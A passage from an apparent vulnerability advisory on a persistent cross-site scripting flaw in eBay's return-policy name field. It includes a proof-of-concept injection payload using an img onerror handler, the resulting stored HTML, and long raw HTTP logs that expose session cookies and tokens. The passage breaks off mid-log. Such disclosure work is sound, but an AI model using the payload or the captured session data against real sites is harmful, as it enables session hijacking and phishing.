`businesspolicy/manage` and `Activity Log - Item Listing` modules. The attack vector is persistent and the severity is medium. The security risk of the persistent web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.0. Exploitation of the persistent input validation vulnerability requires a low privileged web-application user account and low user interaction. Successful exploitation results in session hijacking, persistent phishings attacks, persistent external redirect and malware loads or persistent manipulation of affected and connected module context. Request Method(s): [+] POST Vulnerable Module(s): [+] My Account > Return Policy > Edit Return Policy (http://www.bizpolicy.ebay.com/businesspolicy/) Vulnerable Input(s): [+] Edit return policy > Policy name Vulnerable Parameter(s): [+] name Affected Module(s): [+] ebay.com/businesspolicy/manage [+] Activity Log - Item Listing > Name Proof of Concept (PoC): ======================= The application-side cross site web vulnerability can be exploited by remote attackers with low privileged application user account and low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Manage your business policies http://www.bizpolicy.ebay.com/businesspolicy/return?profileId=52844186015&mode=edit&catId=ALL&profileName=Return+Policy+1+ %22%3E%3Cimg+src%3Dx+onerror%3Dprompt([PERSISTENT INJECTED SCRIPT CODES!])%3B%3E&profileDesc=Returns+Accepted%2C+Buyer%2C+14+Days%2C+Money +Back&catDefault=on&returnsAcceptedOption=ReturnsAccepted&returnsWithinOption=Days_14&refundOption=MoneyBack&shippingCostPaidByOption=Buyer&description=&_=1395079926788 PoC: Manage your business policies <a href="return?totalPages=1&profileType=RETURN_POLICY&profileId=52844186015&pageNumber=1&source=manage">Return Policy 1 [PERSISTENT SCRIPT CODE EXECUTION!]"><img src="x" onerror="prompt(23);"></a> --- PoC Session Logs [GET] (Injection)--- Status: 200[OK] GET http://www.bizpolicy.ebay.com/businesspolicy/return?profileId=52844186015&mode=edit&catId=ALL&profileName=Return++%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E&profileDesc=Returns+Accepted%2C+Buyer%2C+14+Days%2C+Money+Back+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E++++%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E&catDefault=on&returnsAcceptedOption=ReturnsAccepted&returnsWithinOption=Days_14&refundOption=MoneyBack&shippingCostPaidByOption=Buyer&description=+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E&_=1395079183016 Load Flags[LOAD_BACKGROUND ] Gr???e des Inhalts[-1] Mime Type[application/json] Request Header: Host[www.bizpolicy.ebay.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0] Accept[application/json, text/javascript, */*; q=0.01] Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3] Accept-Encoding[gzip, deflate] X-Requested-With[XMLHttpRequest] Referer[http://www.bizpolicy.ebay.com/businesspolicy/return?totalPages=1&profileId=52844186015&pageNumber=1&source=manage] Cookie[ebay=%5EsfLMD%3D1391608831%5Esin%3Din%5Edv%3D532737c1%5Esbf%3D%23200000000000c0048002004%5Ecos%3D1%5Ecv%3D15555%5Ejs%3D1%5Epsi%3DAMiGpAAE*%5E; dp1=bkms/in56e99ed8^u1f/Benjamin55086b58^tzo/-3c532745e8^idm/153274c6b^exc/0%3A0%3A0%3A0534ec4d8^pcid/159931376355086b58^reg/%5EflagReg%3D1%5E56e99ed8^mms/0.53272b71.053288945^mpc/0%7C77533466d8^a1p/053288958^u1p/MjAxNC5rdW56bQ**55086b58^bl/DE56e99ed8^pbf/%2340000000000081a88200000455086b58^; s=BAQAAAUSucEmyAAWAAAwAClMoiVgxMjI1NjM3OTA2APgAIFMoiVhkMGE1YWU0NTE0NDBhNDI4YjM4MmZlMzJmZmZmZmU4NAAGAAFTKIlYMAFKABhTKIlYNTMyNzM3YzAuMC4xLjExLjc4LjIuMC4yAWUAAlMoiVgjMgASAApTKIlYdGVzdENvb2tpZQA9AApTKIlYMjAxNC5rdW56bQCoAAFTKHhdMQD0ACJTKIlYJDIkQVBLaE5ZL1AkLnVqQ2dESkNIYi52bU9vNXpMUlR6MQDuAH5TKIlYMQZodHRwOi8vbXkuZWJheS5jb20vd3MvZUJheUlTQVBJLmRsbD9NeWVCYXkmbXllYmF5PSZ0b2tlbmlkPTQ4JmN1cnJlbnRwYWdlPU15ZUJheVByZWZlcmVuY2VzJnNzcGFnZW5hbWU9c3VjY2Vzc0FkUHJlZmVyZW5jZXMHAAEAClMoeF0yMDE0Lmt1bnptALgADFMnOQQxMzk1MDc5MzUwOjAAAwABUyiJWDAv3s3bBB0RgoZUFN7eKtp3q+XXQw**; nonsession=BAQAAAUSucEmyAAaAAJ0ACFUIa1gwMDAwMDAwMQC0AAFTJ0XoMAFkAANVCGtYIzhhADMACVUIa1gzNDEyOCxERVUAywABUyc+4DkAmgALUynJ3TIwMTQua3Vuem1uAEAAClUIa1gyMDE0Lmt1bnptABAAClUIa1gyMDE0Lmt1bnptAPMAIlUIa1gkMiRBUEtoTlkvUCQudWpDZ0RKQ0hiLnZtT281ekxSVHoxAMoAIFyNOVhjNzdjZjNkZjE0NDBhMzU4NmMyNDRhZDRmZmZmZmU0ZgFNABhVCGtYNTMyNzM3Y2EuMC4xLjIuMTM2LjAuMC4yAAQAClUIWl0yMDE0Lmt1bnptAJwAOFUIa1huWStzSFoyUHJCbWRqNndWblkrc0VaMlByQTJkajZBR2tvZW5DNWVMb1FxZGo2eDluWStzZVE9PQFMABhVCGtYNTMyNzM3YzAuMC4xLjExLjc4LjMuMC4ymyXRGsd3A9RVp8GyedSQ2Mpg46Y*; cssg=d0a5ae451440a428b382fe32fffffe84; cid=xAMhIMTTiG9hpoAp%231599313763; lucky9=9393341; npii=btguid/c77cf3df1440a3586c244ad4fffffe4f55086b58^cguid/c77cfce61440a56b23d61f96fe2e024155086b58^; ds1=ats/1395074781098; ns1=BAQAAAUSucEmyAAaAAKUADVUIa1gxMjI1NjM3OTA2LzA7ps7P/+muFmbIebGiTM4y7QojOkA*; secses=BAQAAAUSucEmyAAaAAUsAGFUIa1g1MzI3MzdjMC4wLjEuMTEuNzguMi4wLjLdM4p5xXUvbFN7uT+3s6eDqkVrhQ**; shs=BAQAAAUSucEmyAAaAAVUADlMwYV01MTYyMjA1MzEwMDQsM0lQMoD56FArTr0IRZNrcW0RgsFk; JSESSIONID=A6DA3F8E8AAAD1275E907380FF01C01A; ds2=sotr/b7qgDzzzzzzz^] Connection[keep-alive] Response Header: rlogid[t6al%7Cwliodz%3F%3Cwk%7D%3Ee36e*715f-144d1330b33-0x95] Set-Cookie[JSESSIONID=5C2569C0FFBDC86ABDFC0BFBE77658C6; Path=/ ds2=;Domain=.ebay.com;Path=/ ds1=ats/1395074781098;Domain=.ebay.com;Path=/ ebay=%5EsfLMD%3D1391608831%5Esin%3Din%5Esbf%3D%23200000000000c0048002004%5Edv%3D532737c1%5Ecos%3D1%5Ecv%3D15555%5Ejs%3D1%5E;Domain=.ebay.com;Path=/ cssg=d0a5ae451440a428b382fe32fffffe84;Domain=.ebay.com;Path=/ ns1=BAQAAAUSucEmyAAaAAKUADVUIa5MxMjI1NjM3OTA2LzA7u3yVKIuPORIyGkkPfr8OcQuzK7o*;Domain=.ebay.com;Expires=Tue, 17-Mar-2015 17:59:47 GMT;Path=/; HttpOnly dp1=bkms/in56e99f13^u1f/Benjamin55086b93^tzo/-3c53274623^idm/153274c6b^exc/0%3A0%3A0%3A0534ec513^pcid/159931376355086b93^reg/%5EflagReg%3D1%5E56e99f13^mpc/0%7C7753346713^mms/0.53272b71.053288945^a1p/053288993^u1p/MjAxNC5rdW56bQ**55086b93^bl/DE56e99f13^pbf/%2340000000000081a88200000455086b93^;Domain=.ebay.com;Expires=Wed, 16-Mar-2016 17:59:47 GMT;Path=/ s=BAQAAAUSucEmyAAWAAAwAClMoiZMxMjI1NjM3OTA2AAYAAVMoiZMwAPgAIFMoiZNkMGE1YWU0NTE0NDBhNDI4YjM4MmZlMzJmZmZmZmU4NAFKABhTKImTNTMyNzM3YzAuMC4xLjExLjc4LjIuMC4yAWUAAlMoiZMjMgASAApTKImTdGVzdENvb2tpZQA9AApTKImTMjAxNC5rdW56bQCoAAFTKHhdMQD0ACJTKImTJDIkQVBLaE5ZL1AkLnVqQ2dESkNIYi52bU9vNXpMUlR6MQDuAH5TKImTMQZodHRwOi8vbXkuZWJheS5jb20vd3MvZUJheUlTQVBJLmRsbD9NeWVCYXkmbXllYmF5PSZ0b2tlbmlkPTQ4JmN1cnJlbnRwYWdlPU15ZUJheVByZWZlcmVuY2VzJnNzcGFnZW5hbWU9c3VjY2Vzc0FkUHJlZmVyZW5jZXMHAAEAClMoeF0yMDE0Lmt1bnptALgADFMnOT8xMzk1MDc5MzUwOjAAAwABUyiJkzDDEUmmricxEndGpoBjz/CyDgT4jg**;Domain=.ebay.com;Path=/; HttpOnly secses=BAQAAAUSucEmyAAaAAUsAGFUIa5M1MzI3MzdjMC4wLjEuMTEuNzguMi4wLjIkh3iWsd46p2pvujmnDykXMnpWKA**;Domain=.ebay.com;Path=/; HttpOnly nonsession=BAQAAAUSucEmyAAaAAJ0ACFUIa5MwMDAwMDAwMQC0AAFTJ0YjMAFkAANVCGuTIzhhADMACVUIa5MzNDEyOCxERVUAywACUyc/GzEwAJoAC1Mpyd0yMDE0Lmt1bnptbgBAAApVCGuTMjAxNC5rdW56bQAQAApVCGuTMjAxNC5rdW56bQDKACBcjTmTYzc3Y2YzZGYxNDQwYTM1ODZjMjQ0YWQ0ZmZmZmZlNGYA8wAiVQhrkyQyJEFQS2hOWS9QJC51akNnREpDSGIudm1PbzV6TFJUejEBTQAYVQhrkzUzMjczN2NhLjAuMS4yLjEzNi4wLjAuMgAEAApVCFpdMjAxNC5rdW56bQFMABhVCGuTNTMyNzM3YzAuMC4xLjExLjc4LjMuMC4yAJwAOFUIa5NuWStzSFoyUHJCbWRqNndWblkrc0VaMlByQTJkajZBR2tvZW5DNWVMb1FxZGo2eDluWStzZVE9PX7IQgibAoX1mYyjT4uLQSg4TVkI;Domain=.ebay.com;Expires=Tue, 17-Mar-2015 17:59:47 GMT;Path=/ lucky9=9393341;Domain=.ebay.com;Expires=Sat, 16-Mar-2019 17:59:47 GMT;Path=/] Content-Encoding[gzip] Content-Type[application/json;charset=UTF-8] Transfer-Encoding[chunked] Date[Mon, 17 Mar 2014 17:59:47 GMT] Server[eBay Server] Status: 200[OK] GET http://my.ebay.com/ws/eBayISAPI.dll?GetGHNotificationsCommand&up=1&ts=-1&_=1395075357940 Load Flags[LOAD_BACKGROUND ] Gr???e des Inhalts[22] Mime Type[text/plain] Request Header: Host[my.ebay.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0] Accept[text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01] Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3] Accept-Encoding[gzip, deflate] X-Requested-With[XMLHttpRequest] Referer[http://my.ebay.com/ws/eBayISAPI.dll?MyEbayBeta&CurrentPage=MyeBayNextNotificationPreferences&FClassic=true&ssPageName=STRK:ME:MANPX&_trksid=p5039.m2295.l3917] Cookie[ebay=%5EsfLMD%3D1391608831%5Esin%3Din%5Esbf%3D%23200000000000c0048002004%5Edv%3D532737c1%5Ecos%3D1%5Ecv%3D15555%5Ejs%3D1%5E; dp1=bkms/in56e99f13^u1f/Benjamin55086b93^tzo/-3c53274623^idm/153274c6b^exc/0%3A0%3A0%3A0534ec513^pcid/159931376355086b93^reg/%5EflagReg%3D1%5E56e99f13^mpc/0%7C7753346713^mms/0.53272b71.053288945^a1p/053288993^u1p/MjAxNC5rdW56bQ**55086b93^bl/DE56e99f13^pbf/%2340000000000081a88200000455086b93^; s=BAQAAAUSucEmyAAWAAAwAClMoiZMxMjI1NjM3OTA2AAYAAVMoiZMwAPgAIFMoiZNkMGE1YWU0NTE0NDBhNDI4YjM4MmZlMzJmZmZmZmU4NAFKABhTKImTNTMyNzM3YzAuMC4xLjExLjc4LjIuMC4yAWUAAlMoiZMjMgASAApTKImTdGVzdENvb2tpZQA9AApTKImTMjAxNC5rdW56bQCoAAFTKHhdMQD0ACJTKImTJDIkQVBLaE5ZL1AkLnVqQ2dESkNIYi52bU9vNXpMUlR6MQDuAH5TKImTMQZodHRwOi8vbXkuZWJheS5jb20vd3MvZUJheUlTQVBJLmRsbD9NeWVCYXkmbXllYmF5PSZ0b2tlbmlkPTQ4JmN1cnJlbnRwYWdlPU15ZUJheVByZWZlcmVuY2VzJnNzcGFnZW5hbWU9c3VjY2Vzc0FkUHJlZmVyZW5jZXMHAAEAClMoeF0yMDE0Lmt1bnptALgADFMnOT8xMzk1MDc5MzUwOjAAAwABUyiJkzDDEUmmricxEndGpoBjz/CyDgT4jg**; nonsession=BAQAAAUSucEmyAAaAAJ0ACFUIa5MwMDAwMDAwMQC0AAFTJ0YjMAFkAANVCGuTIzhhADMACVUIa5MzNDEyOCxERVUAywACUyc/GzEwAJoAC1Mpyd0yMDE0Lmt1bnptbgBAAApVCGuTMjAxNC5rdW56bQAQAApVCGuTMjAxNC5rdW56bQDKACBcjTmTYzc3Y2YzZGYxNDQwYTM1ODZjMjQ0YWQ0ZmZmZmZlNGYA8wAiVQhrkyQyJEFQS2hOWS9QJC51akNnREpDSGIudm1PbzV6TFJUejEBTQAYVQhrkzUzMjczN2NhLjAuMS4yLjEzNi4wLjAuMgAEAApVCFpdMjAxNC5rdW56bQFMABhVCGuTNTMyNzM3YzAuMC4xLjExLjc4LjMuMC4yAJwAOFUIa5NuWStzSFoyUHJCbWRqNndWblkrc0VaMlByQTJkajZBR2tvZW5DNWVMb1FxZGo2eDluWStzZVE9PX7IQgibAoX1mYyjT4uLQSg4TVkI; cssg=d0a5ae451440a428b382fe32fffffe84; cid=xAMhIMTTiG9hpoAp%231599313763; lucky9=9393341; npii=btguid/c77cf3df1440a3586c244ad4fffffe4f55086b58^cguid/c77cfce61440a56b23d61f96fe2e024155086b58^; ds1=ats/1395074781098; ns1=BAQAAAUSucEmyAAaAAKUADVUIa5MxMjI1NjM3OTA2LzA7u3yVKIuPORIyGkkPfr8OcQuzK7o*; secses=BAQAAAUSucEmyAAaAAUsAGFUIa5M1MzI3MzdjMC4wLjEuMTEuNzguMi4wLjIkh3iWsd46p2pvujmnDykXMnpWKA**; shs=BAQAAAUSucEmyAAaAAVUADlMwYV01MTYyMjA1MzEwMDQsM0lQMoD56FArTr0IRZNrcW0RgsFk; JSESSIONID=37628EA4B997D2976280801A071E51EE; ds2=] Connection[keep-alive] Response Header: Server[Apache-Coyote/1.1] rlogid[p4n%7Cceb%7Cehq%60%3C%3Dsm%7E0a54d.g%6047-144d1334a30-0x133] Set-Cookie[ds1=ats/1395074781098; Domain=.ebay.com; Path=/ ds2=; Domain=.ebay.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ ebay=%5EsfLMD%3D1391608831%5Esbf%3D%23200000000000c0048002004%5Ecos%3D1%5Ecv%3D15555%5Esin%3Din%5Ejs%3D1%5Edv%3D532737c1%5E; Domain=.ebay.com; Path=/ dp1=ba1p/0532889a3^bl/DE56e99f23^kms/in56e99f23^reg/%5EflagReg%3D1%5E56e99f23^pcid/159931376355086ba3^mpc/0%7C7753346723^pbf/%2340000000000081a88200000455086ba3^tzo/-3c53274633^exc/0%3A0%3A0%3A0534ec523^mms/0.53272b71.053288945^u1p/MjAxNC5rdW56bQ**55086ba3^u1f/Benjamin55086ba3^idm/153274c6b^; Domain=.ebay.com; Expires=Wed, 16-Mar-2016 18:00:03 GMT; Path=/ ns1=BAQAAAUSucEmyAAaAAKUADVUIa6MxMjI1NjM3OTA2LzA7QZZOFOpy8ayMp8onGgFulfsBYFA*;Domain=.ebay.com;Expires=Tue, 17-Mar-2015 18:00:03 GMT;Path=/; HttpOnly cssg=d0a5ae451440a428b382fe32fffffe84; Domain=.ebay.com; Path=/ s=BAQAAAUSucEmyAAWAAAEAClMoeF0yMDE0Lmt1bnptAAMAAVMoiaMwAWUAAlMoiaMjMgAGAAFTKImjMACoAAFTKHhdMQFKABhTKImjNTMyNzM3YzAuMC4xLjExLjc4LjIuMC4yAAwAClMoiaMxMjI1NjM3OTA2AO4AflMoiaMxBmh0dHA6Ly9teS5lYmF5LmNvbS93cy9lQmF5SVNBUEkuZGxsP015ZUJheSZteWViYXk9JnRva2VuaWQ9NDgmY3VycmVudHBhZ2U9TXllQmF5UHJlZmVyZW5jZXMmc3NwYWdlbmFtZT1zdWNjZXNzQWRQcmVmZXJlbmNlcwcAEgAKUyiJo3Rlc3RDb29raWUA9AAiUyiJoyQyJEFQS2hOWS9QJC51akNnREpDSGIudm1PbzV6TFJUejEA+AAgUyiJo2QwYTVhZTQ1MTQ0MGE0MjhiMzgyZmUzMmZmZmZmZTg0ALgADFMnOU8xMzk1MDc5MzUwOjAAPQAKUyiJozIwMTQua3Vuem1Ejb6V2GvxX+CZLB1SZINlLcDnjA**;Domain=.ebay.com;Path=/; HttpOnly nonsession=BAQAAAUSucEmyAAaAAEAAClUIa6MyMDE0Lmt1bnptAWQAA1UIa6MjOGEABAAKVQhaXTIwMTQua3Vuem0AygAgXI05o2M3N2NmM2RmMTQ0MGEzNTg2YzI0NGFkNGZmZmZmZTRmAMsAAlMnPysxMAFMABhVCGujNTMyNzM3YzAuMC4xLjExLjc4LjMuMC4yAU0AGFUIa6M1MzI3MzdjYS4wLjEuMi4xMzYuMC4wLjIAEAAKVQhrozIwMTQua3Vuem0AMwAJVQhrozM0MTI4LERFVQDzACJVCGujJDIkQVBLaE5ZL1AkLnVqQ2dESkNIYi52bU9vNXpMUlR6MQC0AAFTJ+7wMACaAAtTKcndMjAxNC5rdW56bW4AnAA4VQhro25ZK3NIWjJQckJtZGo2d1ZuWStzRVoyUHJBMmRqNkFHa29lbkM1ZUxvUXFkajZ4OW5ZK3NlUT09AJ0ACFUIa6MwMDAwMDAwMTwIsT4ZdmKze+o6aCD30vVea2+e; Domain=.ebay.com; Expires=Tue, 17-Mar-2015 18:00:03 GMT; Path=/ secses=BAQAAAUSucEmyAAaAAUsAGFUIa6M1MzI3MzdjMC4wLjEuMTEuNzguMi4wLjJ5+5WwmaLoxSDYeRvnyhWgee/Y/g**; Domain=.ebay.com; Path=/ lucky9=9393341; Domain=.ebay.com; Expires=Sat, 16-Mar-2019 18:00:03 GMT; Path=/] Cache-Control[private] Pragma[no-cache] Content-Type[text/plain] Content-Length[22] Date[Mon, 17 Mar 2014 18:00:03 GMT] Status: 200[OK] GET http://my.ebay.com/ws/eBayISAPI.dll?GetGHNotificationsCommand&up=1&ts=-1&_=1395079046614 Load Flags[LOAD_BACKGROUND ] Gr???e des Inhalts[22] Mime Type[text/plain] Request Header: Host[my.ebay.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0] Accept[text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01] Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3] Accept-Encoding[gzip, deflate] X-Requested-With[XMLHttpRequest] Referer[http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&CurrentPage=MyeBayPreferences&FClassic=true&ssPageName=STRK:ME:MAPRX] Cookie[ebay=%5EsfLMD%3D1391608831%5Esbf%3D%23200000000000c0048002004%5Ecos%3D1%5Ecv%3D15555%5Esin%3Din%5Ejs%3D1%5Edv%3D532737c1%5E; dp1=ba1p/0532889a3^bl/DE56e99f23^kms/in56e99f23^reg/%5EflagReg%3D1%5E56e99f23^pcid/159931376355086ba3^mpc/0%7C7753346723^pbf/%2340000000000081a88200000455086ba3^tzo/-3c53274633^exc/0%3A0%3A0%3A0534ec523^mms/0.53272b71.053288945^u1p/MjAxNC5rdW56bQ**55086ba3^u1f/Benjamin55086ba3^idm/153274c6b^; s=BAQAAAUSucEmyAAWAAAEAClMoeF0yMDE0Lmt1bnptAAMAAVMoiaMwAWUAAlMoiaMjMgAGAAFTKImjMACoAAFTKHhdMQFKABhTKImjNTMyNzM3YzAuMC4xLjExLjc4LjIuMC4yAAwAClMoiaMxMjI1NjM3OTA2AO4AflMoiaMxBmh0dHA6Ly9teS5lYmF5LmNvbS93cy9lQmF5SVNBUEkuZGxsP015ZUJheSZteWViYXk9JnRva2VuaWQ9NDgmY3VycmVudHBhZ2U9TXllQmF5UHJlZmVyZW5jZXMmc3NwYWdlbmFtZT1zdWNjZXNzQWRQcmVmZXJlbmNlcwcAEgAKUyiJo3Rlc3RDb29raWUA9AAiUyiJoyQyJEFQS2hOWS9QJC51akNnREpDSGIudm1PbzV6TFJUejEA+AAgUyiJo2QwYTVhZTQ1MTQ0MGE0MjhiMzgyZmUzMmZmZmZmZTg0ALgADFMnOU8xMzk1MDc5MzUwOjAAPQAKUyiJozIwMTQua3Vuem1Ejb6V2GvxX+CZLB1SZINlLcDnjA**; nonsession=BAQAAAUSucEmyAAaAAEAAClUIa6MyMDE0Lmt1bnptAWQAA1UIa6MjOGEABAAKVQhaXTIwMTQua3Vuem0AygAgXI05o2M3N2NmM2RmMTQ0MGEzNTg2YzI0NGFkNGZmZmZmZTRmAMsAAlMnPysxMAFMABhVCGujNTMyNzM3YzAuMC4xLjExLjc4LjMuMC4yAU0AGFUIa6M1MzI3MzdjYS4wLjEuMi4xMzYuMC4wLjIAEAAKVQhrozIwMTQua3Vuem0AMwAJVQhrozM0MTI4LERFVQDzACJVCGujJDIkQVBLaE5ZL1AkLnVqQ2dESkNIYi52bU9vNXpMUlR6MQC0AAFTJ+7wMACaAAtTKcndMjAxNC5rdW56bW4AnAA4VQhro25ZK3NIWjJQckJtZGo2d1ZuWStzRVoyUHJBMmRqNkFHa29lbkM1ZUxvUXFkajZ4OW5ZK3NlUT09AJ0ACFUIa6MwMDAwMDAwMTwIsT4ZdmKze+o6aCD30vVea2+e; cssg=d0a5ae451440a428b382fe32fffffe84; cid=xAMhIMTTiG9hpoAp%231599313763; lucky9=9393341; npii=btguid/c77cf3df1440a3586c244ad4fffffe4f55086b58^cguid/c77cfce61440a56b23d61f96fe2e024155086b58^; ds1=ats/1395074781098; ns1=BAQAAAUSucEmyAAaAAKUADVUIa6MxMjI1NjM3OTA2LzA7QZZOFOpy8ayMp8onGgFulfsBYFA*; secses=BAQAAAUSucEmyAAaAAUsAGFUIa6M1MzI3MzdjMC4wLjEuMTEuNzguMi4wLjJ5+5WwmaLoxSDYeRvnyhWgee/Y/g**; shs=BAQAAAUSucEmyAAaAAVUADlMwYV01MTYyMjA1MzEwMDQsM0lQMoD56FArTr0IRZNrcW0RgsFk; JSESSIONID=37628EA4B997D2976280801A071E51EE] Connection[keep-alive] Response Header: Server[Apache-Coyote/1.1] rlogid[p4n%7Cceb%7Cehq%60%3C%3Dsm%7E0a54d.32%3Ef-144d1334c9e-0x132] Set-Cookie[ds1=ats/1395074781098; Domain=.ebay.com; Path=/ ebay=%5EsfLMD%3D1391608831%5Esbf%3D%23200000000000c0048002004%5Ecos%3D1%5Ecv%3D15555%5Esin%3Din%5Ejs%3D1%5Edv%3D532737c1%5E; Domain=.ebay.com; Path=/ dp1=ba1p/0532889a3^bl/DE56e99f23^kms/in56e99f23^reg/%5EflagReg%3D1%5E56e99f23^pcid/159931376355086ba3^pbf/%2340000000000081a88200000455086ba3^mpc/0%7C7753346723^tzo/-3c53274633^exc/0%3A0%3A0%3A0534ec523^mms/0.53272b71.053288945^u1p/MjAxNC5rdW56bQ**55086ba3^u1f/Benjamin55086ba3^idm/153274c6b^; Domain=.ebay.com; Expires=Wed, 16-Mar-2016 18:00:03 GMT; Path=/ ns1=BAQAAAUSucEmyAAaAAKUADVUIa6MxMjI1NjM3OTA2LzA7QZZOFOpy8ayMp8onGgFulfsBYFA*;Domain=.ebay.com;Expires=Tue, 17-Mar-2015 18:00:03 GMT;Path=/; HttpOnly cssg=d0a5ae451440a428b382fe32fffffe84; Domain=.ebay.com; Path=/ s=BAQAAAUSucEmyAAWAAAEAClMoeF0yMDE0Lmt1bnptAAMAAVMoiaMwAWUAAlMoiaMjMgAGAAFTKImjMACoAAFTKHhdMQFKABhTKImjNTMyNzM3YzAuMC4xLjExLjc4LjIuMC4yAAwAClMoiaMxMjI1NjM3OTA2AO4AflMoiaMxBmh0dHA6Ly9teS5lYmF5LmNvbS93cy9lQmF5SVNBUEkuZGxsP015ZUJheSZteWViYXk9JnRva2VuaWQ9NDgmY3VycmVudHBhZ2U9TXllQmF5UHJlZmVyZW5jZXMmc3NwYWdlbmFtZT1zdWNjZXNzQWRQcmVmZXJlbmNlcwcAEgAKUyiJo3Rlc3RDb29raWUA9AAiUyiJoyQyJEFQS2hOWS9QJC51akNnREpDSGIudm1PbzV6TFJUejEA+AAgUyiJo2QwYTVhZTQ1MTQ0MGE0MjhiMzgyZmUzMmZmZmZmZTg0ALgADFMnOU8xMzk1MDc5MzUwOjAAPQAKUyiJozIwMTQua3Vuem1Ejb6V2GvxX+CZLB1SZINlLcDnjA**;Domain=.ebay.com;Path=/; HttpOnly nonsession=BAQAAAUSucEmyAAaAAEAAClUIa6MyMDE0Lmt1bnptAWQAA1UIa6MjOGEABAAKVQhaXTIwMTQua3Vuem0AygAgXI05o2M3N2NmM2RmMTQ0MGEzNTg2YzI0NGFkNGZmZmZmZTRmAMsAAlMnPysxMAFMABhVCGujNTMyNzM3YzAuMC4xLjExLjc4LjMuMC4yAU0AGFUIa6M1MzI3MzdjYS4wLjEuMi4xMzYuMC4wLjIAEAAKVQhrozIwMTQua3Vuem0AMwAJVQhrozM0MTI4LERFVQDzACJVCGujJDIkQVBLaE5ZL1AkLnVqQ2dESkNIYi52bU9vNXpMUlR6MQC0AAFTJ+7wMACaAAtTKcndMjAxNC5rdW56bW4AnAA4VQhro25ZK3NIWjJQckJtZGo2d1ZuWStzRVoyUHJBMmRqNkFHa29lbkM1ZUxvUXFkajZ4OW5ZK3NlUT09AJ0ACFUIa6MwMDAwMDAwMTwIsT4ZdmKze+o6aCD30vVea2+e; Domain=.ebay.com; Expires=Tue, 17-Mar-2015 18:00:03 GMT; Path=/ secses=BAQAAAUSucEmyAAaAAUsAGFUIa6M1MzI3MzdjMC4wLjEuMTEuNzguMi4wLjJ5+5WwmaLoxSDYeRvnyhWgee/Y/g**; Domain=.ebay.com; Path=/ lucky9=9393341; Domain=.ebay.com; Expires=Sat, 16-Mar-2019 18:00:03 GMT; Path=/] Cache-Control[private] Pragma[no-cache] Content-Type[text/plain] Content-Length[22] Date[Mon, 17 Mar 2014 18:00:03 GMT] PoC: Activity log: Return Policy 1 [x] <div> <h2 class="act-title">Activity log: <span id="policy_name">Return Policy 1 "><[PERSISTENT INJECTED SCRIPT CODES!]);"></span></h2> <div id="activityLogContent" class="act-cnt"> <table cellpadding="0" cellspacing="0"> <thead><tr> <th class="first">Date/Time</th> <th class="second">Action</th> <th class="third">Description</th> <th class="fourth">Report</th> </tr></thead></table> Note: After the exploitation the active log serivce is also compromised. --- PoC Session Logs [GET] --- Status: 200[OK] GET http://www.bizpolicy.ebay.com/businesspolicy/x[PERSISTENT INJECTED SCRIPT CODE!] Load Flags[LOAD_NORMAL] Gr???e des Inhalts[1201] Mime Type[text/html] Request Header: Host[www.bizpolicy.ebay.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0] Accept[image/png,image/*;q=0.8,*/*;q=0.5] Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://www.bizpolicy.ebay.com/businesspolicy/manage?totalPages=1] Cookie[ebay=%5Epsi%3DASTJiAAE*%5EsfLMD%3D1391608831%5Esbf%3D%23200000000000c0048002004%5Ecos%3D1%5Ecv%3D15555%5Esin%3Din%5Ejs%3D1%5Edv%3D53273c55%5E; dp1=ba1p/053289001^bl/DE56e9a581^kms/in56e9a581^reg/%5EflagReg%3D1%5E56e9a581^pcid/159931376355087201^mpc/0%7C7753346d81^pbf/%2340000000000081a88200000455087201^tzo/-3c53274c91^exc/0%3A0%3A0%3A0534ecb81^mms/0.53272b71.053288945^u1p/MjAxNC5rdW56bQ**55087201^u1f/Benjamin55087201^idm/153274c6b^; 